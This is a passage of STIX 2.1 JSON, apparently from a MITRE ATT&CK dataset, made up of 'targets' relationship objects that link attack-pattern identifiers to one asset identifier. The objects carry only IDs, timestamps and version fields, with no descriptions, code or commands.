"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bb2457f4-39a4-4399-8e53-49acbd76b2b5", "created": "2024-07-01T10:37:15.819077", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819080", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--43e2def1-9bc2-4fd6-b60b-ba95380a1145", "created": "2024-07-01T10:37:15.819089", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819092", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d18fd917-6bfe-4ec7-94d4-cd61178ca502", "created": "2024-07-01T10:37:15.819100", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819102", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe5ce764-b9a0-4db5-b7cc-798b0a1441bc", "created": "2024-07-01T10:37:15.819110", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819112", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1a60bd41-3494-4be7-8699-2eaf2db3c685", "created": "2024-07-01T10:37:15.819120", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819122", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--62221c3a-13f8-49ed-9206-c3fb240557a7", "created": "2024-07-01T10:37:15.819130", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819132", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a9a35300-971d-41eb-92a0-bc746ee14bf2", "created": "2024-07-01T10:37:15.819141", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819143", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ff09e76b-119a-4b5b-9672-c3b9cffde7a8", "created": "2024-07-01T10:37:15.819151", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819153", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--206226c2-cdd6-496a-82fd-09a16e3ed9a7", "created": "2024-07-01T10:37:15.819161", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819163", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c6c6b80-51c8-4264-8c36-3cda02a5620a", "created": "2024-07-01T10:37:15.819171", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819173", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--629189e2-17f1-4b14-a89f-3429e9e78965", "created": "2024-07-01T10:37:15.819181", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819184", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bbfab718-a6bb-4aaf-87d9-24af6b5a7b46", "created": "2024-07-01T10:37:15.819192", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819194", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe819ff5-1966-4436-bbea-461dad77142d", "created": "2024-07-01T10:37:15.819202", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819204", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9551cca5-7a1b-422e-ae4d-bdb14eda58d3", "created": "2024-07-01T10:37:15.819212", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819214", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ae2b7761-02ca-4a55-8421-6444c26016ec", "created": "2024-07-01T10:37:15.819222", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819224", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da021199-63a0-42e6-b83c-78ce6a5846d0", "created": "2024-07-01T10:37:15.819233", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819235", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a73748b1-2a8c-4fbb-8d72-4fe93219ed8c", "created": "2024-07-01T10:37:15.819243", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819245", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f4c4ac58-b9cc-467e-a085-37467d2c0307", "created": "2024-07-01T10:37:15.819253", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819255", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--67b4fdac-815a-4bc1-87ef-a7100470f9ea", "created": "2024-07-01T10:37:15.819263", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819265", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e7258551-d83d-4059-87c8-b5ceba1c6b96", "created": "2024-07-01T10:37:15.819273", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819275", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4a0ea2f5-f400-4e22-b093-b3b988d8fab4", "created": "2024-07-01T10:37:15.819283", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819285", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--80ab5bcc-6d24-4fd0-b42d-4a8b1f8d04c2", "created": "2024-07-01T10:37:15.819293", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819295", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--922d418b-d7c0-4536-9755-2c9a485c9425", "created": "2024-07-01T10:37:15.819303", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819305", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0ce559fd-bce9-4d3c-b40e-9dcbec7d316e", "created": "2024-07-01T10:37:15.819313", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819315", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1916f1a8-e6f2-40e8-95fa-094f552067e5", "created": "2024-07-01T10:37:15.819324", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819326", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--923f3c36-9d2d-425c-bd34-cb5ac5362389", "created": "2024-07-01T10:37:15.819334", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819336", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b29e0a9-534f-49c0-9374-870ab5a6feaf", "created": "2024-07-01T10:37:15.819344", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819346", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ebe2d3a-a584-4b8e-85b1-3325b50f8739", "created": "2024-07-01T10:37:15.819354", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819357", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a7fa8d48-56f1-4de8-844f-aa50c9fae36b", "created": "2024-07-01T10:37:15.819365", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819367", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c024b32c-5a47-4a73-894b-cf50a9295ccf", "created": "2024-07-01T10:37:15.819375", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819377", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--56a7552a-b5af-4521-b8d9-a5cfd7df73be", "created": "2024-07-01T10:37:15.819385", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819387", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e8ce241e-1562-45a3-b686-9ff72889f652", "created": "2024-07-01T10:37:15.819395", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819397", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb635d16-e646-4f4f-8277-246310954d81", "created": "2024-07-01T10:37:15.819406", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819408", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8894d70b-be7b-4a03-98c7-849bc82bf761", "created": "2024-07-01T10:37:15.819416", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819418", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f9e3a906-d2c5-4613-8dca-b0dde322df90", "created": "2024-07-01T10:37:15.819426", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819428", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f176f67a-cef7-4802-aa29-05162bb9669b", "created": "2024-07-01T10:37:15.819436", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819438", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2d8321ac-3c69-4c90-8862-090b7c516c4e", "created": "2024-07-01T10:37:15.819447", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819449", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--629228ce-be6b-476e-acd2-2304b05a837a", "created": "2024-07-01T10:37:15.819457", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819459", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f5d754c-a6f2-4a9c-9cac-8e4672182384", "created": "2024-07-01T10:37:15.819467", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819469", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f9fd7cd-fc85-4a60-9013-7e1079d095a8", "created": "2024-07-01T10:37:15.819477", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819479", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d18b6d1d-f67b-4b54-bc96-0671df65837d", "created": "2024-07-01T10:37:15.819487", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.819489", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": 